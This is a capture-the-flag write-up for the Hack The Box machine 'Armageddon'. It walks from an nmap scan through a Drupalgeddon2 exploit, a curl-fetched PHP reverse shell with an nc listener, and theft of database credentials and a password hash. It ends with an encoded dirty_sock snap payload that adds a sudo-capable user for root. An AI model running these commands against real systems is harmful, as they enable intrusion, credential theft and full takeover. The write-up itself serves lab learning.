Armageddon
Armageddon is an easy box from Hack The Box.
Enumeration
Nmap returns just 2 ports, 22 and 80. The web server appears to be running Drupal 7. A more specific version number could be helpful.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
Checking out http://10.10.10.233/CHANGELOG.txt reveals that the server is running Drupal 7.56 as of its most recent update.
Exploitation
Checking for any publicly available exploits with searchsploit drupal 7.56:
Drupal 7.56 looks like it should be vulnerable to the Drupalgeddon2 exploit.
I can copy that script over with searchsploit -m php/webapps/44449.rb.
Run the script, which I’ve renamed for ease of use, and I have a low-priv shell as user apache:
ruby drupalgeddon2.rb 10.10.10.233
The shell does not have a lot of functionality, unfortunately. I can’t even change directories so I need to find a more persistent solution.
I have access to curl and am able to write to the web root, so I’ll upload the handy php-reverse-shell from pentestmonkey and use that instead.
First, I host my reverse shell on a web server of my own with sudo python -m SimpleHTTPServer 80.
Then curl http://10.10.14.22/rev.php -o rev.php in the drupalgeddon shell to pull it down and write it to the web root.
Finally, start a listener on my box with nc -lvnp 80 and call the reverse shell with curl 10.10.10.233/rev.php.
I had initially tried to get a listener on port 4444, but it did not work. There is probably a firewall rule limiting outgoing connections to 80 or 443, as those are the only 2 ports I was able to get a connection on.
That’s more like it. Now I can actually move around the file system.
Privilege Escalation
This new shell is admittedly not much better than the drupalgeddon one. The usual python shell upgrade tricks don’t work, so I’ll have to make do with what I’ve got.
Digging through web config files in /var/www/html/sites/default there is a file settings.php that contains some interesting information.
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
MySQL creds!
Due to the nature of the shoddy shell I’m using, MySQL behavior is a little weird.
I try to connect to the DB with mysql -u drupaluser -p and enter the password when prompted, but I don’t get any response.
It took a while to put together, but MySQL is accepting the commands, it just won’t output the results until I send an exit command, at which point it returns the results of my queries all at once.
So, after some trial and error, and stumbling through in the dark, I manage to find a password hash in the users table of the drupal database.
use drupal;
select * from users;
exit
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
I copy the hash into a file and send that to john to see if he can crack it.
john bruce.txt --wordlist=/usr/share/wordlists/rockyou.txt
Looks like brucetherealadmin password is booboo.
I use those creds to SSH in:
Time to see what my man bruce can get up to.
sudo -l to check his sudo permissions.
Bruce has the ability to install a snap package as the root user. It shouldn’t be too hard to leverage that into a root shell.
I found this one-liner which will create a user with root privileges.
python -c 'print("aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "==")' | base64 -d > payload.snap
With the snap package created, install it:
sudo /usr/bin/snap install payload.snap --dangerous --devmode
su dirty_sock to become the new user.
sudo -i to drop into a root shell.
